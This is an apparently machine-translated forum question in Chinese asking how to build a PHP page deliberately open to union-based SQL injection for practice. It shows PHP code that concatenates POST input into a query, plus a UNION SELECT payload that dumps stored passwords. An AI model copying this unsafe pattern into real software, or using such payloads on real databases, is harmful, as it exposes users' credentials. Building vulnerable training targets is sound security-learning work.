我有一个奇怪的问题:我需要创建一个SQL漏洞注入脚本!目标是该脚本仅受到基于Union的攻击!
这是我的剧本:
$req = "SELECT pseudo, mail FROM membres WHERE pseudo='".$_POST['membre']."'";
$ans = $bdd->query($req);
while($data = $ans->fetch()){
echo '<p><b>'.$data['pseudo'].'</b> : '.$data['mail'].' '.$data['password'].'</p>';
}
正如您所看到的,如果您输入:
' UNION SELECT password, pseudo FROM membres#
脚本将输出db的所有密码!但这不太现实!我的$ data ['password']都是准备好的回声,但是由于defalt而空了!
如何制作一个适当的易受攻击的脚本,允许黑客列出所有表,所有列!
因为在我的情况下只有一两个有效载荷可以工作!
谢谢